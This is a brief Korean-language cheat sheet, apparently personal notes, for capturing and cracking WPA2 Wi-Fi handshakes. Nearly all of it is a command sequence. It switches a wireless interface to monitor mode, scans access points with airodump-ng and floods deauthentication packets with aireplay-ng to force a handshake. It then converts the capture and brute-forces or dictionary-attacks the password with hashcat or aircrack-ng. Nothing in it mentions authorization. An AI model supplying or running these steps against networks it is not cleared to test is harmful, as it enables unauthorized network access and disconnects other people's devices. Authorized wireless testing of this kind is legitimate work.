WPA2는 인증할때 salt와 kdf2값의 패킷을 수집하여 이를 BF 또는 Dict 공격하는 방법이 있다.

Enter wlan interface to monitor mode

airmon-ng start wlp4s0
airmon-ng check kill
rfkill list
rfkill unblock [dev_id]

Scan APs

airodump-ng -c 5 wlp4s0mo [–band a (for 5ghz)]
airodump-ng –bssid [bssid] -c 6 –write packet wlp4s0mo

Send Deauth Packet

aireplay-ng –deauth 100 -a [Station] wlp4s0mo

Convert cap to haccpx – out dated way

cap2hccapx.bin packet-01.cap out.haccpx

Convert cap to hc22000

hcxpcapngtool -o hash.hc22000 -E wordlist dumpfile.pcapng

Run hashcat

hashcat -m 2500 out.hccapx -a3 -?d?d?d?d?d?d?d?d -w3

hashcat -m 22000 hash.hc22000 wordlist.txt

or use aircrack-ng

$ aircrack-ng dumpfile.pcapng -w wordlist.txt